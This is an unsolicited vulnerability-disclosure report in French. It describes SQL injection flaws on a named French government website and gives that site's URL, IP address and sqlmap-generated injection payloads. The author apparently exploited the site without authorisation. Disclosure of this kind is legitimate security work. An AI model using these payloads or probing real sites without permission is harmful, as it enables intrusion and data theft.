Présentation et Sommaire

Rapport partiel de test de penetration - Maël Bonniot

Site cible : assainissement.developpement-durable.gouv.fr

Domaine père : developpement-durable.gouv.fr
Adresse IP : 37.235.89.249 - Serveur Proxy
Moteur web : Nginx
Moteur de base de donnée : MySQL >=5.0

Vecteur d'attaque : Site Web

Failles exploitables : Faille SQL Booléene aveugle*, Erreur SQL, Faille SQL basée sur le temps aveugle
Service touché : assainissement.developpement-durable.gouv.fr
URL cible : assainissement.developpement-durable.gouv.fr/fiche.php?code=1' and [t] and '1'='1

*Signifie que l'injection ne retourne aucune erreur

Déroulement de l'attaque :
- Récuperation du plan du site à l'aide d'un moteur de recherche
- Triage des liens en ne gardant que ceux contenants une extension php (.php)
- Analyse de différents types de vulnérabilités sur les liens obtenus précédemment
- Vulnérabilitées trouvées: failles sql
- Exploitation de la faille avec l'outil de récuperation de base de donnée : sqlmap
- Ecriture de ce rapport de test de penetration

Je certifie sur l'honneur qu'aucune des données que j'ai pu récuperer n'ont été diffusée ni copiée. Ainsi je vous présente ce
rapport à des fins amicales dans le but que votre système informatique ne fasse pas l'objet d'une intrusion future.

La suite du rapport indique la nature des failles, les risques qu'elle présente ainsi que les recommandations à suivre dans
le but de corriger ces dernières.

Failles
Failles

Les failles présentent sur le serveur suivant : assainissement.developpement-durable.gouv.fr sont de nature faille SQL
Booléene aveugle, Erreur SQL, Faille SQL basée sur le temps aveugle elles sont présentes au sein du logiciel MySQL gérant
la base de donnée du site.

A l'aide du site web communiquant avec la base de donnée MySQL il est possible d'injecter des commandes normalement
non autorisées à l'intérieur de MySQL, résultant à une possible récuperation de base de donnée, contenant :
- Les utilisateurs MySQL ainsi qu leurs mots de passe,
- Le nom des bases du serveur MySQL,
- Une partie des informations affichées sur le site,
- L'adresse IP interne du serveur MySQL,
- Des détails sensibles concernant la version du système d'exploitation de la machine,

Ici ne sont présents que les plus gros risques cependant je n'ai pas tout énuméré car la suite n'est pas aussi critique et
qu'elle dépend de beaucoup plus de facteurs devant résulter à une attention moins privilégiée.

Dans la prochaine partie seront exposés les risques auxquels l'infrastructure peut être soumis à cause de ces failles.

Risques
Risques

Les vecteurs d'attaque sont les suivants :

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: code=1 and [t] and 1=1' OR NOT 8549=8549#

1/2
 Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: code=1 and [t] and 1=1' AND (SELECT 7583 FROM(SELECT COUNT(*),CONCAT(0x71767a7671,(SELECT
(ELT(7583=7583,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QXaB

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: code=1 and [t] and 1=1' AND (SELECT 5520 FROM (SELECT(SLEEP(10)))VJWp)-- YBYU

Et sont exploitables depuis le chemin : assainissement.developpement-durable.gouv.fr/fiche.php?<payload>

Elle donne lui à des risques (voir ci-dessous)

Ces informations et cet accès mal configuré pourraient permettre à un potentiel pirate d'acceder à des ressources
sensibles et d'effectuer des actions malveillantes incluant :
- Une compromisation partielle/totale du parc informatique incluant le domaine père : developpement-durable.gouv.fr,
- Une divulgation d'informations sensibles,
- Un accès à des domaines restreints et un potentiel accès à d'autre site du gouvernement à l'aide de certificats récupéré
sur ce serveur,
- Une compromisation partielle/totale du site web,
- Un compromisation totale de la base de donnée,
- Un accès privilégié sur le serveur (l'utilisateur MySQL est aussi administrateur du serveur),

D'autres risques moins importants sont aussi présents mais seront corrigés simplement par la correction des failles citées
ci-dessus.

Synthèse et recommandation
Synthèse et recommandation

Ce test de penetration n'est que très partiel et incomplet car je ne souhaitais pas continuer plus loin que la simple
découverte de ces failles. Je peux néanmoins si vous m'autorisez à effectuer des tests plus appronfondis vous donner plus
de détails.

Je vous recommande vivement de corriger ces failles, elles sont très critiques et pourrait permettre à des personnes mal
intentionnées d'accéder à des ressources êxtremement sensible.

Voici un lien vous permettant de corriger cette faille : https://openclassrooms.com/fr/courses/2091901-protegez-vous-

efficacement-contre-les-failles-web/2680180-linjection-sql

Je reste à votre entière disposition, si vous souhaitez me contacter voici mon e-mail : maelbonniot@gmail.com

Cordialement,

2/2